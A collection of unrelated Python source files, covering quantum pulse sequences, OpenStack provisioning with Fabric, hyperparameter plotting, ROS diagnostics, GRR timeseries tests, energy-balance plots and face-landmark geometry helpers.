#select two indices mu_1 and mu_2 to be cleaned according to the condition
#sqrt(k/mu_1), sqrt(k/mu_2) are not integers
for idx in range(len(remaining_indices)):
subspace_idx = remaining_indices[idx]
if k % subspace_idx != 0 or (isqrt(k // subspace_idx)) ** 2 != (k // subspace_idx):
two_pulse_spaces.append(subspace_idx)
if len(two_pulse_spaces) == 2:
remaining_spaces.extend(remaining_indices[idx + 1:])
break
else:
remaining_spaces.append(subspace_idx)
return two_pulse_spaces, remaining_spaces
def perpendicular_vector(axis, theta = 0):
'''
Computes a vector perpendicular to a given axis with a degree of freedom
Inputs:
axis: the axis to which a perpendicular axis vector is found
theta: a degree of freedom for the choice of perpendicular axis, ranges from 0 to 2*pi
Returns:
a vector perpendicular to the given vector
'''
#if the axis is the z-hat vector, take the x-hat vector as the first perpendicular vector
if abs(axis[0]) < 1e-12 and abs(axis[1]) < 1e-12:
perp_axis_1 = np.array([1, 0, 0])
#otherwise, switch the x- and y-components and negate to obtain a perpendicular vector
else:
perp_axis_1 = np.array([-axis[1], axis[0], 0])
perp_axis_1 = perp_axis_1 / np.linalg.norm(perp_axis_1)
#use the cross product to find another perpendicular vector
perp_axis_2 = np.cross(axis, perp_axis_1)
perp_axis_2 = perp_axis_2 / np.linalg.norm(perp_axis_2)
#find a perpendicular vector from the combination of these two perpendicular vectors
#taking theta as a degree of freedom
return np.cos(theta) * perp_axis_1 + np.sin(theta) * perp_axis_2
def pre_and_post_conjugation(rotation_sequence, subspace_num):
'''
Produces the subspace-independent axis-angle representations of the
daggered and undaggered operations corresponding to a sequence on a given subspace
Inputs:
rotation_sequence: a list of 2-tuples specifying a sequence of axis-angle pulses
subspace_num: the 1-indexed number of the subspace on which these pulses are to be applied
Returns:
two lists of 2-tuples, the first of which corresponds to the daggered subspace-independent version of the input sequence
and the second of which corresponds to the undaggered subspace-independent version of the input sequence
'''
#reverse the sequence and negate the angles to produce the daggered version
#divide angles by the square root of the subspace number such that the rotations are subspace-independent
pre_conjugate_seq = [(axis, -angle / np.sqrt(subspace_num)) for (axis, angle) in reversed(rotation_sequence)]
post_conjugate_seq = [(axis, angle / np.sqrt(subspace_num)) for (axis, angle) in rotation_sequence]
return pre_conjugate_seq, post_conjugate_seq
def switch_axes_conjugation(init_axis, final_axis, subspace_num):
'''
Finds conjugation that switches a rotation about the initial axis to one about the final axis
on the subspace given by subspace_num
Inputs:
init_axis (array): initial axis of the rotation on the subspace
final_axis (array): final axis of the rotation on the subspace
subspace_num (int): 1-indexed number of the subspace
Returns:
two lists of 2-tuples, the first of which corresponds to the part of the conjugation before the rotation
and the second of which corresponds to the oart of the conjugation after the rotation
'''
axis_rotate, angle_rotate = axis_switch(init_axis, final_axis)
rotation_sequence = xy_decomposition(axis_rotate, angle_rotate)
pre_conjugate_seq, post_conjugate_seq = pre_and_post_conjugation(rotation_sequence, subspace_num)
return pre_conjugate_seq, post_conjugate_seq
def produce_sequence(n, k, gate = "X", perp_thetas = 0, decomp_thetas = 0):
'''
Produces a sequence that places a particular non-identity gate on a given subspace
and identity gates on all other subspaces for a finite-dimensional QO-Qudit
Inputs:
n (int): the number of subspaces in the finite quantum oscillator
k (int): the number of the subspace on which to place a non-identity gate
gate (str): the type of non-identity gate ("X" or "Y")
perp_thetas (float/int or list): degrees of freedom for finding perpendicular axes for cleaning n - 3 subspaces
decomp_thetas (float/int or list): degrees of freedom for xy-decomposition axes for cleaning n - 3 subspaces
Returns:
a list of 2-tuples with the axis-angle representations of the rotation sequence
to be performed to attain the desired gate on subspace k of n subspaces
'''
#if the non-identity subspace number exceeds the number of subspaces, raise an error
if k > n: raise ValueError("nonidentity gate position must be in range")
#if either subspace number or count is not an integer, raise an error
if type(k) is not int: raise TypeError("nonidentity gate position must be integer")
if type(n) is not int: raise TypeError("number of subspaces must be integer")
if n > 2:
#processing degrees of freedom for choosing perpendicular and xy-decomposition axes
if type(perp_thetas) is not list:
perp_thetas = [perp_thetas for _ in range(n - 3)]
if type(decomp_thetas) is not list:
decomp_thetas = [decomp_thetas for _ in range(n - 3)]
#raise exception if given degrees of freedom do not match those expected
if len(perp_thetas) != (n - 3):
raise ValueError("degrees of freedom for choice of perpendicular axes must be number of subspaces minus 3")
if len(decomp_thetas) != (n - 3):
raise ValueError("degrees of freedom for choice of xy-decomposition axes must be number of subspaces minus 3")
#handle the case of one subspace with one direct rotation
if n == 1:
if gate == "X":
return [(np.array([1, 0, 0]), np.pi)]
elif gate == "Y":
return [(np.array([0, 1, 0]), np.pi)]
else:
raise Exception("unsupported gate " + gate)
#handle the other base case of two subspaces
elif n == 2:
phi1 = np.arccos(1 / np.tan(np.pi / np.sqrt(2)))
phi2 = np.arccos(1 / np.tan(np.pi * np.sqrt(2)))
if k == 1:
seq = [(np.pi * np.sqrt(2), phi1), (np.pi / 2, 0), (np.pi * np.sqrt(2), phi1), (-np.pi / 2, 0)]
if gate == "X":
return [(phi_to_axis(phi), theta) for (theta, phi) in seq]
elif gate == "Y":
return [(phi_to_axis(phi + np.pi / 2), theta) for (theta, phi) in seq]
else:
raise Exception("unsupported gate " + gate)
elif k == 2:
seq = [(np.pi * 2, phi2), (np.pi / (2 * np.sqrt(2)), 0), (np.pi * 2, phi2), (-np.pi / (2 * np.sqrt(2)), 0)]
if gate == "X":
return [(phi_to_axis(phi), theta) for (theta, phi) in seq]
elif gate == "Y":
return [(phi_to_axis(phi + np.pi / 2), theta) for (theta, phi) in seq]
else:
raise Exception("unsupported gate " + gate)
#initialize sequences
pulse_sequence = []
two_pulse_spaces, remaining_spaces = identity_order(n, k)
n1 = two_pulse_spaces[0]
n2 = two_pulse_spaces[1]
phi1 = np.pi / np.sqrt(n1)
phi2 = 2 * np.pi / np.sqrt(n2)
#degree of freedom for 4-pulse sequence
angle4 = 0
#definition of 4-pulse sequence
identity_pulse_sequence = [(np.array([-np.sin(angle4), np.cos(angle4), 0]), phi2),
(np.array([np.cos(angle4), np.sin(angle4), 0]), phi1),
(np.array([-np.sin(angle4), np.cos(angle4), 0]), phi2),
(np.array([np.cos(angle4), np.sin(angle4), 0]), -phi1)]
#iterate over the remaining spaces to clean to identity
for idx, n_idx in enumerate(remaining_spaces):
#find the rotations on this subspace
idx_rotations = [quaternion.from_rotation_vector(vec * angle * np.sqrt(n_idx)) for (vec, angle) in identity_pulse_sequence]
#perform these rotations starting from the identity to find the final composite rotation on the subspace
idx_subspace = np.quaternion(1, 0, 0, 0)
for idx_rotation in idx_rotations:
idx_subspace = idx_rotation * idx_subspace
#find the angle and axis corresponding to the composite rotation on this subspace
idx_subspace_vec = quaternion.as_rotation_vector(idx_subspace)
idx_subspace_angle = np.linalg.norm(idx_subspace_vec)
if abs(idx_subspace_angle) < 1e-10:
continue
idx_subspace_axis = idx_subspace_vec / idx_subspace_angle
perp_axis = perpendicular_vector(idx_subspace_axis, perp_thetas[idx])
identity_rotation_sequence = xy_decomposition(perp_axis, np.pi, decomp_thetas[idx])
identity_pre_conjugate_seq, identity_post_conjugate_seq = pre_and_post_conjugation(identity_rotation_sequence, n_idx)
identity_pulse_sequence = identity_pulse_sequence + identity_pre_conjugate_seq + identity_pulse_sequence + identity_post_conjugate_seq
#apply the identity pulse sequence above on the subspace with the non-identity gate
gate_subspace = np.quaternion(1, 0, 0, 0)
gate_pulse_sequence = [quaternion.from_rotation_vector(vec * angle * np.sqrt(k)) for (vec, angle) in identity_pulse_sequence]
for pulse in gate_pulse_sequence:
gate_subspace = pulse * gate_subspace
#extract the axis and angle of the rotation on the subspace with the non-identity gate
gate_subspace_vec = quaternion.as_rotation_vector(gate_subspace)
gate_subspace_angle = np.linalg.norm(gate_subspace_vec)
gate_subspace_axis = gate_subspace_vec / gate_subspace_angle
print("garbage", gate_subspace_vec)
#determine the desired rotations with the angle of the rotation on the subspace with the non-identity gate
#that produce the desired gate on this subspace
alpha, beta, num_b_rotations = alpha_beta_decomposition(gate_subspace_angle, gate)
#determine the sequences by which the rotation on the subspace
#with the non-identity gate must be conjugated to yield the beta and alpha rotations
beta_pre_conjugate_seq, beta_post_conjugate_seq = switch_axes_conjugation(gate_subspace_axis, beta, k)
alpha_pre_conjugate_seq, alpha_post_conjugate_seq = switch_axes_conjugation(gate_subspace_axis, alpha, k)
#repeat the rotation on the subspace with the non-identity gate and conjugate to produce the beta rotations
pulse_sequence.extend(beta_pre_conjugate_seq)
for _ in range(num_b_rotations):
pulse_sequence.extend(identity_pulse_sequence)
pulse_sequence.extend(beta_post_conjugate_seq)
#conjugate the rotation on the subspace with the non-identity gate to produce the alpha rotation
pulse_sequence.extend(alpha_pre_conjugate_seq)
pulse_sequence.extend(identity_pulse_sequence)
pulse_sequence.extend(alpha_post_conjugate_seq)
#return the final pulse sequence
return pulse_sequence
def find_final_quaternions(pulse_sequence, n):
'''
Finds the final quaternion representation of the rotation on each of the first n subspaces
after the sequence of pulses given by pulse_sequence
Inputs:
pulse_sequence (list): a list of angle-axis tuples specifying the pulse sequence to be performed
Returns:
list of quaternions representing the composite rotations on the first n subspaces
'''
pulse_subspace_list = [[quaternion.from_rotation_vector(vec * angle * np.sqrt(s + 1)) for (vec, angle) in pulse_sequence] for s in range(n)]
rotation_list = [np.quaternion(1, 0, 0, 0) for s in range(n)]
for pulse_idx in range(len(pulse_sequence)):
rotation_list = [pulse_subspace_list[s][pulse_idx] * rotation_list[s] for s in range(n)]
return rotation_list
def find_final_angle_axis(pulse_sequence, n):
'''
Finds the final angle-axis representation of the rotation on each of the first n subspaces
after the sequence of pulses given by pulse_sequence
Inputs:
pulse_sequence (list): a list of angle-axis tuples specifying the pulse sequence to be performed
Returns:
list of axis-angle tuples representing the composite rotations on the first n subspaces
'''
final_quaternions = find_final_quaternions(pulse_sequence, n)
final_rotations = [quaternion.as_rotation_vector(q) for q in final_quaternions]
return [(np.linalg.norm(vec), vec / np.linalg.norm(vec)) if np.linalg.norm(vec) > 1e-12 else (0, np.array([0.0, 0.0, 0.0])) for vec in final_rotations]
def find_theta_phi_representation(pulse_sequence):
'''
Finds theta, phi representation of sequence of axis-angle rotations,
*assuming that all of the axes lie in the xy-plane*
Inputs:
pulse_sequence (list): a list of rotations in axis-angle tuple representation, must all be in xy-plane (i.e., have axis[2] = 0)
Returns:
list of tuples of theta-phi tuples representing the input rotation sequence
'''
return [(angle, np.arctan2(axis[1], axis[0])) for (axis, angle) in pulse_sequence]
|
StarcoderdataPython
|
1679072
|
import argparse
from fabric.api import *
from fabric.tasks import Task
from playback import __version__
class Common(Task):
"""
the common library for OpenStack Provisioning
:param user(str): the user for remote server to login
:param hosts(list): this is a second param
:param key_filename(str): the ssh private key to used, default None
:param password(str): the password for remote server
:param parallel(bool): paralleler execute on remote server, default True
:returns: None
"""
def __init__(self, user='ubuntu', hosts=None, key_filename=None, password=<PASSWORD>, parallel=True, *args, **kwargs):
super(Common, self).__init__(*args, **kwargs)
self.user = user
self.hosts = hosts
self.parallel = parallel
self.key_filename = key_filename
self.password = password
env.user = self.user
env.hosts = self.hosts
env.parallel = self.parallel
env.key_filename = self.key_filename
env.password = <PASSWORD>
env.abort_on_prompts = False
def _release(self):
release = sudo('lsb_release -cs')
return release
|
StarcoderdataPython
|
3212617
|
<reponame>DBernardes/Macro-SPARC4-CCD-cameras<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# Este codigo plota os valores do ruido de leitura encontrados
#pela biblioteca hyperopt em funcao do numero de iteracao.
#22/11/2019. <NAME>.
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import json
from sys import exit
##arq = open(r'Logs\Parameters\log.txt', 'r')
##lines_parameters = arq.read().splitlines()
##lines_parameters = [i.split('\t') for i in lines_parameters]
##arq.close()
array_dic_modes=[]
with open(r'Logs\Parameters\log.txt', 'r') as arq:
lines = arq.read().splitlines()
for line in lines:
dic = json.loads(line)
array_dic_modes.append(dic)
arq.close()
##arq = open(r'Logs\Loss\log.txt', 'r')
##lines_loss = arq.read().splitlines()
##lines_loss = [float(i) for i in lines_loss[:-1]]
##arq.close()
t_exp = {'0.1':[], '1':[], '10':[], '20':[], '30':[]}
em_mode = {'0.1':[], '1':[], '10':[], '20':[], '30':[]}
em_gain = {'0.1':[], '1':[], '10':[], '20':[], '30':[]}
hss = {'0.1':[], '1':[], '10':[], '20':[], '30':[]}
preamp = {'0.1':[], '1':[], '10':[], '20':[], '30':[]}
binn = {'0.1':[], '1':[], '10':[], '20':[], '30':[]}
loss ={'0.1':[], '1':[], '10':[], '20':[], '30':[]}
for i in range(len(array_dic_modes)):
dic = array_dic_modes[i]
#line = [float(i) for i in line]
if dic['hss'] == 0.1:
t_exp['0.1'].append(dic['t_exp'])
em_mode['0.1'].append(dic['em_mode'])
em_gain['0.1'].append(dic['em_gain'])
preamp['0.1'].append(dic['preamp'])
binn['0.1'].append(dic['binn'])
loss['0.1'].append(dic['snr'])
if dic['hss'] == 1:
t_exp['1'].append(dic['t_exp'])
em_mode['1'].append(dic['em_mode'])
em_gain['1'].append(dic['em_gain'])
preamp['1'].append(dic['preamp'])
binn['1'].append(dic['binn'])
loss['1'].append(dic['snr'])
if dic['hss'] == 10:
t_exp['10'].append(dic['t_exp'])
em_mode['10'].append(dic['em_mode'])
em_gain['10'].append(dic['em_gain'])
preamp['10'].append(dic['preamp'])
binn['10'].append(dic['binn'])
loss['10'].append(dic['snr'])
if dic['hss'] == 20:
t_exp['20'].append(dic['t_exp'])
em_mode['20'].append(dic['em_mode'])
em_gain['20'].append(dic['em_gain'])
preamp['20'].append(dic['preamp'])
binn['20'].append(dic['binn'])
loss['20'].append(dic['snr'])
if dic['hss'] == 30:
t_exp['30'].append(dic['t_exp'])
em_mode['30'].append(dic['em_mode'])
em_gain['30'].append(dic['em_gain'])
preamp['30'].append(dic['preamp'])
binn['30'].append(dic['binn'])
loss['30'].append(dic['snr'])
fig = plt.figure()
list_fake2Dlines = []
list_labels = []
ax = fig.add_subplot((111), projection='3d')
if t_exp['30']:
ax.scatter(t_exp['30'], em_gain['30'], loss['30'], c='blue', marker='o', alpha=0.5)
fake2Dline1 = mpl.lines.Line2D([0],[0], linestyle="none", c='blue', marker = 'o')
list_fake2Dlines.append(fake2Dline1)
list_labels.append(r'30 MHz')
if t_exp['20']:
ax.scatter(t_exp['20'], em_gain['20'], loss['20'], c='red', marker='o', alpha=0.5)
fake2Dline2 = mpl.lines.Line2D([0],[0], linestyle="none", c='red', marker = 'o')
list_fake2Dlines.append(fake2Dline2)
list_labels.append(r'20 MHz')
if t_exp['10']:
ax.scatter(t_exp['10'], em_gain['10'], loss['10'], c='green', marker='o', alpha=0.5)
fake2Dline3 = mpl.lines.Line2D([0],[0], linestyle="none", c='green', marker = 'o')
list_fake2Dlines.append(fake2Dline3)
list_labels.append(r'10 MHz')
if t_exp['1']:
ax.scatter(t_exp['1'], em_gain['1'], loss['1'], c='tab:purple', marker='o', alpha=0.6)
fake2Dline4 = mpl.lines.Line2D([0],[0], linestyle="none", c='tab:purple', marker = 'o')
list_fake2Dlines.append(fake2Dline4)
list_labels.append(r'1 MHz')
if t_exp['0.1']:
ax.scatter(t_exp['0.1'], em_gain['0.1'], loss['0.1'], c='tab:olive', marker='o', alpha=0.8)
fake2Dline5 = mpl.lines.Line2D([0],[0], linestyle="none", c='tab:olive', marker = 'o')
list_fake2Dlines.append(fake2Dline5)
list_labels.append(r'0,1 MHz')
ax.set_xlabel('Exposure Time (s)')
ax.set_ylabel('EM Gain')
ax.set_zlabel('SNR*FA')
ax.legend(list_fake2Dlines, list_labels, numpoints = 1)
plt.show()
'''
for i in x:
line = lines_parameters[i]
binn = 0
if line[5] == str(2): binn = 1
if line[4] == str(1):
t_exp_1[binn].append(float(line[0]))
em_mode_1[binn].append(float(line[1]))
em_gain_1[binn].append(float(line[2]))
hss_1[binn].append(float(line[3]))
preamp_1[binn].append(float(line[4]))
binn_1[binn].append(float(line[5]))
loss_1[binn].append(lines_loss[i])
else:
t_exp_2[binn].append(float(line[0]))
em_mode_2[binn].append(float(line[1]))
em_gain_2[binn].append(float(line[2]))
hss_2[binn].append(float(line[3]))
preamp_2[binn].append(float(line[4]))
binn_2[binn].append(float(line[5]))
loss_2[binn].append(lines_loss[i])
'''
|
StarcoderdataPython
|
1655449
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of <NAME>, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: <NAME>, <NAME>, <NAME>
from diagnostic_msgs.msg import DiagnosticStatus
from python_qt_binding.QtGui import QColor, QIcon
import rospy
# TODO: Utils and common configs are mixed in this class.
# Instantiating icons that show the device status.
_ERR_ICON = QIcon.fromTheme('dialog-error')
_WARN_ICON = QIcon.fromTheme('dialog-warning')
_OK_ICON = QIcon.fromTheme('emblem-default')
# Added following this QA thread http://goo.gl/83tVZ
_STALE_ICON = QIcon.fromTheme('dialog-question')
_LEVEL_TO_ICON = {0: _OK_ICON, 1: _WARN_ICON, 2: _ERR_ICON, 3: _STALE_ICON}
_LEVEL_TO_COLOR = {0: QColor(85, 178, 76), # green
1: QColor(222, 213, 17), # yellow
2: QColor(178, 23, 46), # red
3: QColor(40, 23, 176) # blue
}
_LEVEL_TO_TEXT = { 0: "OK", 1: "WARNING", 2: "ERROR", 3: "STALE" }
def level_to_icon(level):
if level in _LEVEL_TO_ICON:
return _LEVEL_TO_ICON[level]
else:
return _ERR_ICON
def level_to_color(level):
if level in _LEVEL_TO_COLOR:
return _LEVEL_TO_COLOR[level]
else:
return _LEVEL_TO_COLOR[2]
def level_to_text(level):
if level in _LEVEL_TO_TEXT:
return _LEVEL_TO_TEXT[level]
else:
return "UNKNOWN(%d)" % ( level )
def get_resource_name(status_name):
"""
Get resource name from path
:param: status_name is a string that may consists of status names that
are delimited by slash.
:rtype: str
"""
name = status_name.split('/')[-1]
rospy.logdebug(' get_resource_name name = %s', name)
return name
def get_color_for_message(msg):
"""
Get the overall (worst) color for a DiagnosticArray
:param msg: DiagnosticArray
"""
level = 0
min_level = 255
lookup = {}
for status in msg.status:
if (status.level > level):
level = status.level
if (status.level < min_level):
min_level = status.level
# Stale items should be reported as errors unless all stale
if (level > 2 and min_level <= 2):
level = 2
rospy.logdebug(' get_color_for_message color lv=%d', level)
return level_to_color(level)
def get_status_by_name(msg, name):
for status in msg.status:
if status.name == name:
return status
return None
|
StarcoderdataPython
|
1739826
|
<gh_stars>0
#!/usr/bin/env python
"""Tests for grr.lib.timeseries."""
from grr.lib import flags
from grr.lib import test_lib
from grr.lib import timeseries
class TimeseriesTest(test_lib.GRRBaseTest):
def makeSeries(self):
s = timeseries.Timeseries()
for i in range(1, 101):
s.Append(i, (i + 5) * 10000)
return s
def testAppendFilterRange(self):
s = self.makeSeries()
self.assertEqual(100, len(s.data))
self.assertEqual([1, 60000], s.data[0])
self.assertEqual([100, 1050000], s.data[-1])
s.FilterRange(100000, 200000)
self.assertEqual(10, len(s.data))
self.assertEqual([5, 100000], s.data[0])
self.assertEqual([14, 190000], s.data[-1])
def testNormalize(self):
s = self.makeSeries()
s.Normalize(10 * 10000, 100000, 600000)
self.assertEqual(5, len(s.data))
self.assertEqual([9.5, 100000], s.data[0])
self.assertEqual([49.5, 500000], s.data[-1])
s = timeseries.Timeseries()
for i in range(0, 1000):
s.Append(0.5, i * 10)
s.Normalize(200, 5000, 10000)
self.assertEqual(25, len(s.data))
self.assertListEqual(s.data[0], [0.5, 5000])
self.assertListEqual(s.data[24], [0.5, 9800])
s = timeseries.Timeseries()
for i in range(0, 1000):
s.Append(i, i * 10)
s.Normalize(200, 5000, 10000, mode=timeseries.NORMALIZE_MODE_COUNTER)
self.assertEqual(25, len(s.data))
self.assertListEqual(s.data[0], [519, 5000])
self.assertListEqual(s.data[24], [999, 9800])
def testToDeltas(self):
s = self.makeSeries()
self.assertEqual(100, len(s.data))
s.ToDeltas()
self.assertEqual(99, len(s.data))
self.assertEqual([1, 60000], s.data[0])
self.assertEqual([1, 1040000], s.data[-1])
s = timeseries.Timeseries()
for i in range(0, 1000):
s.Append(i, i * 1e6)
s.Normalize(20 * 1e6,
500 * 1e6,
1000 * 1e6,
mode=timeseries.NORMALIZE_MODE_COUNTER)
self.assertEqual(25, len(s.data))
self.assertListEqual(s.data[0], [519, int(500 * 1e6)])
s.ToDeltas()
self.assertEqual(24, len(s.data))
self.assertListEqual(s.data[0], [20, int(500 * 1e6)])
self.assertListEqual(s.data[23], [20, int(960 * 1e6)])
def testNormalizeFillsGapsWithNone(self):
s = timeseries.Timeseries()
for i in range(21, 51):
s.Append(i, (i + 5) * 10000)
for i in range(81, 101):
s.Append(i, (i + 5) * 10000)
s.Normalize(10 * 10000, 10 * 10000, 120 * 10000)
self.assertEqual(11, len(s.data))
self.assertEqual([None, 100000], s.data[0])
self.assertEqual([22.5, 200000], s.data[1])
self.assertEqual([None, 600000], s.data[5])
self.assertEqual([None, 1100000], s.data[-1])
def testMakeIncreasing(self):
s = timeseries.Timeseries()
for i in range(0, 5):
s.Append(i, i * 1000)
for i in range(0, 5):
s.Append(i, (i + 6) * 1000)
self.assertEqual(10, len(s.data))
self.assertEqual([4, 10000], s.data[-1])
s.MakeIncreasing()
self.assertEqual(10, len(s.data))
self.assertEqual([8, 10000], s.data[-1])
def testAddRescale(self):
s1 = timeseries.Timeseries()
for i in range(0, 5):
s1.Append(i, i * 1000)
s2 = timeseries.Timeseries()
for i in range(0, 5):
s2.Append(2 * i, i * 1000)
s1.Add(s2)
for i in range(0, 5):
self.assertEqual(3 * i, s1.data[i][0])
s1.Rescale(1 / 3.0)
for i in range(0, 5):
self.assertEqual(i, s1.data[i][0])
def testMean(self):
s = timeseries.Timeseries()
self.assertEqual(None, s.Mean())
s = self.makeSeries()
self.assertEqual(100, len(s.data))
self.assertEqual(50, s.Mean())
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
|
StarcoderdataPython
|
4829927
|
# !/usr/bin/python
# coding=utf-8
#
# @Author: LiXiaoYu
# @Time: 2013-10-17
# @Info: Const
#日志类型
LOG_SYSTEM = 1 # 系统日志
LOG_QUEUE = 2 # 队列日志
#日志级别
CRITICAL = 50 # 临界值错误: 超过临界值的错误,例如一天24小时,而输入的是25小时这样
ERROR = 40 # 一般错误: 一般性错误
WARNING = 30 # 警告性错误: 需要发出警告的错误
INFO = 20 # 信息: 程序输出信息
DEBUG = 10 # 调试: 调试信息
#系统级别
MEMORY_LIMIT_ON = 1
|
StarcoderdataPython
|
1790688
|
<gh_stars>0
def csWhereIsBob(names):
'''
input names - a list of strings
output is an integer which is the location of Bob
if Bob not present return -1
'''
if "Bob" not in names:
return -1
for i in range(len(names)):
if names[i] == "Bob":
return i
print(csWhereIsBob(["Jimmy", "Layla", "Bob"])) # 2
print(csWhereIsBob(["Bob", "Layla", "Kaitlyn", "Patricia"])) # 0
print(csWhereIsBob(["Jimmy", "Layla", "James"])) # -1
|
StarcoderdataPython
|
3316204
|
import os
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter
from mpl_toolkits.axisartist.axislines import SubplotZero
# Reading results files
os.chdir(r'C:\Users\pietro\Desktop\MESS2021\testfolder')
techs = pd.read_csv('techinfo.csv',sep =';',index_col='timestamp',parse_dates=True)
build = pd.read_csv('buildingsenergybalances.csv',sep =';',index_col='timestamp',parse_dates=True)
# Day to be simulated
day = '2019-11-15'
## Working on techinfo.csv
techs['1112p'] = 0
techs['1112n'] = 0
techs['1112p'] = techs.apply(lambda x: x['1112p'] if x['1112']<0 else x['1112'], axis=1)
techs['1112n'] = techs.apply(lambda x: x['1112n'] if x['1112']>0 else x['1112'], axis=1)
techs['1123p'] = 0
techs['1123n'] = 0
techs['1123p'] = techs.apply(lambda x: x['1123p'] if x['1123']<0 else x['1123'], axis=1)
techs['1123n'] = techs.apply(lambda x: x['1123n'] if x['1123']>0 else x['1123'], axis=1)
techs['demtot'] = 0
def f(x):
return x['1011']+x['1062']+x['1072']
techs['demtot'] = techs.apply(f, axis=1)
## Working on buildingsenergybalances.csv
build['1_EnBalanceElectr'] = - build['1_EnBalanceElectr']
build['imp'] = 0
build['exp'] = 0
build['imp'] = build.apply(lambda x: x['imp'] if x['1_EnBalanceElectr']<0 else x['1_EnBalanceElectr'], axis=1)
build['exp'] = build.apply(lambda x: x['exp'] if x['1_EnBalanceElectr']>0 else x['1_EnBalanceElectr'], axis=1)
## Building balance df to graph
techsbal = techs.loc[day][['1031','1112p','1112n','1123p','1123n']]
buildbal = build.loc[day][['imp','exp']]
balance = techsbal
imp = buildbal[['imp']]
exp = buildbal[['exp']]
balance.insert(5,'imp',imp,True)
balance.insert(6,'exp',exp,True)
## Building demand df to graph
demandbal = techs.loc[day][['1011','1062','1072']]
demandtot = techs.loc[day][['demtot']]
## Balance graph
fig1, ax1 = plt.subplots(figsize=(10,5))
#fig1 = plt.figure(figsize=(10,5))
## a subplot with two additional axis, "xzero" and "yzero". "xzero" is
## y=0 line, and "yzero" is x=0 line.
#ax1 = SubplotZero(fig1, 1, 1, 1)
#fig1.add_subplot(ax1)
## make xzero axis (horizontal axis line through y=0) visible.
#ax1.axis["xzero"].set_visible(True)
#ax1.axis["xzero"].label.set_text("Axis Zero")
## make other axis (bottom, top, right) invisible.
#for n in ["bottom", "top", "right"]:
# ax1.axis[n].set_visible(False)
ax1.grid(axis='y',ls='dashed',lw=0.5,zorder=1)
ax1.plot(demandtot, c='black',zorder=3)
ax1.bar(x=balance.index,height=balance['1031'], width=40./24/60,zorder=2)
xpos=balance['1031'].copy()
ax1.bar(x=balance.index,height=balance['1112p'], width=40./24/60,bottom=xpos,zorder=2)
xpos=xpos+balance['1112p'].copy()
ax1.bar(x=balance.index,height=balance['1112n'], width=40./24/60,zorder=2)
xneg=balance['1112n'].copy()
ax1.bar(x=balance.index,height=balance['1123p'], width=40./24/60,bottom=xpos,zorder=2)
xpos=xpos+balance['1123p'].copy()
ax1.bar(x=balance.index,height=balance['1123n'], width=40./24/60,bottom=xneg,zorder=2)
xneg = xneg+balance['1123n']
ax1.bar(x=balance.index,height=balance['imp'], width=40./24/60,bottom=xpos,zorder=2)
xpos=xpos+balance['imp'].copy()
ax1.bar(x=balance.index,height=balance['exp'], width=40./24/60,bottom=xneg,zorder=2)
xneg = xneg+balance['exp']
plt.gca().xaxis.set_major_formatter(DateFormatter("%H"))
plt.ylim(-6,8)
plt.xlabel('time [h]')
plt.ylabel('Energy [kWh]')
plt.title(str(day))
line_labels = ['Total demand','PV', 'Batt discharge', 'Batt charge','H2 discharge','H2 charge', 'import','export']
fig1.legend(labels= line_labels, loc=(0.775,0.54))
## Demand graph
#fig2, ax2 = plt.subplots(figsize=(15,7))
#demandbal.plot(kind='bar',ax=ax2,stacked=True,colormap='viridis')
#
#ticks2 = [tick.get_text() for tick in ax2.get_xticklabels()]
#ticks2 = pd.to_datetime(ticks2).strftime('%H')
#ax2.set_xticklabels(ticks2)
|
StarcoderdataPython
|
3362504
|
from face_recognition import face_landmarks
from .settings import TYPES_OF_ENDPOINTS
def point_dividing_a_line_segment(A, B, offset_from_A):
"""
:param A: coordinates of the start point of a line in 2D Space ([x, y] or (x, y))
:type A: list - [] or tuple - ()
:param B: coordinates of the end point of a line in 2D Space ([x, y] or (x, y))
:type B: list - [] or tuple - ()
:param offset_from_A: percent of the Euclidean distance between A and B where 0 % is equal to 0 and 100% is equal to 1.
:type offset_from_A: float
:return: coordinates of point along a line from A to B.
The point is located between points A and B
and is away from point A by the length equal to : (Euclidean distance between A and B) * offset_from_A
A--C------B
:rtype tuple - ()
"""
x = (1 - offset_from_A) * A[0] + offset_from_A * B[0]
y = (1 - offset_from_A) * A[1] + offset_from_A * B[1]
return int(round(x)), int(round(y))
def find_endpoint(coordinates, mode):
"""
:param coordinates: list or tuple of coordinates in 2D Space.
(e.g. [(x, y),(x, y),(x, y)...] or ([x, y],[x, y],[x, y]...))
:type coordinates: list - [] or tuple - ()
:param mode: this parameter indicates which endpoint we look for.
Allowed values of this parameter:
"LEFT" : we look for the point with the minimum 'x' value
"RIGHT": we look for the point with the maximum 'x' value
"BOTTOM": we look for the point with the minimum 'y' value
"TOP": we look for the point with the maximum 'y' value
All the above values are the keys of the TYPES_OF_ENDPOINTS dictionary.
:type mode: string
